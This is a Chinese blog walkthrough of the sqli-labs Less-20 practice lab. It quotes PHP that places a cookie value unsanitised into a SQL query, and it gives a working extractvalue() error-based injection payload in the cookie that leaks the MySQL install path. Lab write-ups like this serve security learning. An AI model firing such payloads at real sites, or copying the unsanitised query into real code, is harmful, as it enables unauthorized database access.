Apr 09 2020

Sqli-labs Less-20 cookie注入 extractvalue()报错注入

作者: 绝缘体..   发布: 2020-04-09 22:04   分类: 未分类   阅读:   抢沙发  
 
更多

从源代码中我们可以看到cookie从username中获得值后,当再次刷新时,会从cookie中读取username,然后进行查询。

关键代码

$cookee = $_COOKIE['uname'];
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
die('Issue with your mysql: ' . mysql_error());

修改登录成功后的请求,在Cookie: uname=admin后面加一个’,重放该请求

从上图可以看出,报SQL语法错误,说明cookie位置存在SQL注入漏洞。

 

如下图所示,我们修改cookie为

uname=admin’ and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) #

可以看到报错了,我们得到了mysql 的路径。

其他的注入方法自行测试呦!

 

参考:https://www.cnblogs.com/lcamry/p/5763024.html

打赏

本文固定链接: https://www.cxy163.net/archives/4982 | 绝缘体

该日志由 绝缘体.. 于 2020年04月09日 发表在 未分类 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Sqli-labs Less-20 cookie注入 extractvalue()报错注入 | 绝缘体
关键字: , , , ,
【上一篇】
【下一篇】

您可能还会对这些文章感兴趣!

  1. python黑帽子(第五章)
  2. CDN绕过
  3. python黑帽子(第二章)
  4. 子域名收集
  5. sqlmap Tamper脚本编写
  6. docker进阶_docker-compose
  7. mysql中int(1)是长度为1的int型吗?
  8. html5 画布时钟效果
  9. js去掉内容中所有html标记的方法
  10. Swoole实践:4-使用Swoole实现在线聊天
  11. 各大网站CSS代码初始化集合
  12. 使用中间件记录Laravel慢请求
  13. 微信图片禁止外链 此图片来自微信公众平台未经允许
  14. 最常用的100个PHP函数排行榜
  15. 使用php编程的一些经验总结
  16. BUUCTF-[WebLogic]CVE-2017-10271(反

Sqli-labs Less-20 cookie注入 extractvalue()报错注入:等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter